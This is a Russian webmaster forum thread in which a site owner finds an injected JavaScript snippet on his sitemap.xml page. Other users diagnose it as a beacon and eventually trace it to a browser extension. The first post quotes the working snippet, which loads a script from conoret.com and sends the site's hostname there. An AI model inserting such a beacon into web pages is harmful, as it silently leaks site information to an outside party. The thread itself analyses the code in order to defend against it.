Скрыть объявление
ВАШИ ПРАВА ОГРАНИЧЕНЫ!

Зарегистрируйтесь на форуме, чтобы стать полноценным участником сообщества!

Вопрос? Помощь в sitemap

Тема в разделе "Вопросы- ответы", создана пользователем vadara, 13 июл 2022.

13.07.22 в 18:41
19.04.23 в 20:40
10
2.835
0
  1. TopicStarter Overlay
    vadara

vadara Бывалый

Лучших ответов:
    0
    Рейтинги:
    +15 / 8 / -0
    Недавно столкнулся с подобной проблемой: когда открываешь карту по адресу сайт.ру/sitemap.xml в САМОМ ВЕРХУ страницы попадается такой текст:
    "window.top === window && !function(){var e=document.createElement("script"),t=document.getElementsByTagName("head")[0];e.src="//conoret.com/dsp?h="+document.location.hostname+"&r="+Math.random(),e.type="text/javascript",e.defer=!0,e.async=!0,t.appendChild(e)}();"
    Видимо ошибка где то в JS если я не ошибаюсь ? Может кто сталкивался ? Влияет на работу карты или оставить пусть торчит.

Попутный вопрос. Заметил кое что только сейчас когда заходил на другие сайты, там стоит sitemap вот как для примера левый сайт нашел у него такой СМ: [​IMG]

Когда я же создаю См через DLE движок, мой код выглядит так:

Есть ли разница ? Или у меня такой же см только создается по другому ? Кто может пояснить за код - с меня что нибудь

2. TeraMoune

TeraMoune Бывалый

Лучших ответов:
    3
    Рейтинги:
    +130 / 9 / -0
    Верно, у тебя создаётся по другому. С правками какого-то мудака.

Код отправляет домен автору кода. Точней даже не так, он создаёт объект script и загружает по url что-то (на самом деле ничего не грузит) но это действие которое по запрашивает js по адресу обязательно логируется на той стороне и данные сохраняются.

Домену ConOret.com 58 дней от роду. Сама главная страница отсутствует и её статус 404, а вот страница по ссылке уже имеет статус 200.

#2 TeraMoune, 13 июл 2022
    Последнее редактирование: 13 июл 2022
    • Нравится Нравится x 1
  3. chuvak

chuvak Бывалый

Лучших ответов:
    1
    Рейтинги:
    +60 / 20 / -0
    Проверяй модули и шаблоны на такую хню, когда скачиваешь с непроверенных источников

4. TopicStarter Overlay
    vadara

vadara Бывалый

Лучших ответов:
    0
    Рейтинги:
    +15 / 8 / -0
    А можно подробнее объяснить на что это повлияет ? Типо будет перенаправлять мой траф или что ? Доменом и хостом не завладеют это 100%

5. TopicStarter Overlay
    vadara

vadara Бывалый

Лучших ответов:
    0
    Рейтинги:
    +15 / 8 / -0
    Где может этот код находится ? Шаблон я весь проверил нигде похожего нет, а из модулей я устанавливал только trailerdp который выкладывал админ зерокула byroot
    Единственное, может ли он находится в движке ? Ибо я скачал 15.2 NULLED

6. TopicStarter Overlay
    vadara

vadara Бывалый

Лучших ответов:
    0
    Рейтинги:
    +15 / 8 / -0
    Спасибо за ответ, если бы не вы не разбрался бы. Суть вот в чём, в браузер или куда-то в файлы залез этот код, видимо где-то что-то скачал, дело не в шабе и не в модулях, открываю с Opera этого кода нет.

7. Pr00f

Pr00f Бывалый

Лучших ответов:
    0
    Рейтинги:
    +164 / 12 / -0
    да много чего могут сделать. поставить редирект, встроить рекламу/майнеры, заменить ссылки/плееры, собирать стату и разные данные.
    еще может быть какое-то расширение встраивает код. с frigate было такое, они тоже встраивали свой зловредный код во все сайты, даже в локалке. нужно на чистом профиле проверить

8. TeraMoune

TeraMoune Бывалый

Лучших ответов:
    3
    Рейтинги:
    +130 / 9 / -0
    vadara. ни на что не повлияет, просто GPS трекер для человека. Возможно он установил уязвимости в системе и чтобы быть вкурсе куда переезжает сайт и в будущем их эксплуатировать сделал такое. Трафик с sitemap не смеши, на этом файле трафика нету кроме поискового бота который изредка проверяет файл, а сам бот не будет учитывать сей скрипт.

Как раз это тоже вероятно, может человек себе рут доступы сделал. И куда бы ты не побежал (в смысле какой бы домен не регнул) он всегда будет знать где твой сайт, а потом приходить и допустим внедрять сторонний код уже для перелива трафика, рекламные скрытые коды и редиректы, майнеры, да хоть базу сливать под шумок, короче может всё на что фантазии хватит, что конкретно и зачем это не понять уже.

p.s. Кстати чел выше дело говорит, может браузерное расширение просто кривое и плохое, они ведь тоже могут на такие хитрости. Или хостер если http протокол тоже могут внедрять js, но там вроде сделали бы просто без заморочек одной строкой без js.

9. TopicStarter Overlay
    vadara

vadara Бывалый

Лучших ответов:
    0
    Рейтинги:
    +15 / 8 / -0
    Ну я и говорю, с оперы открывается без всяких кодов, возможно расширение блокнот устанавливал чтобы хранить пароли в нем По этому куску кода в гугле нашёл бурж сайт где китаец какой-то описывает как данные воровать, видимо вы правы друзья ) Буду осторожнее впредь) и вы будьте бдительны

10. chooy

chooy Зелёный

Лучших ответов:
    0
    Рейтинги:
    +0 / 0 / -0
    Только что ломал голову над такой же проблемой. Оказалось браузерный плагин SaveFrom подсовывал это.

11. Иван Кеноби

Иван Кеноби Зелёный

Лучших ответов:
    0
    Рейтинги:
    +0 / 0 / -0
    Здравствуйте. Зарегистрировался только для того, чтобы рассказать, что я точно определил откуда этот запрос отправляется на conoret.com - это SaveFromHelper - расширение Chrome для скачивания музыки, видео и других данных из ВК и YouTube. Его можно настроить, чтобы оно активировалось только щёлчку через правую кнопку мыши по значку расширения.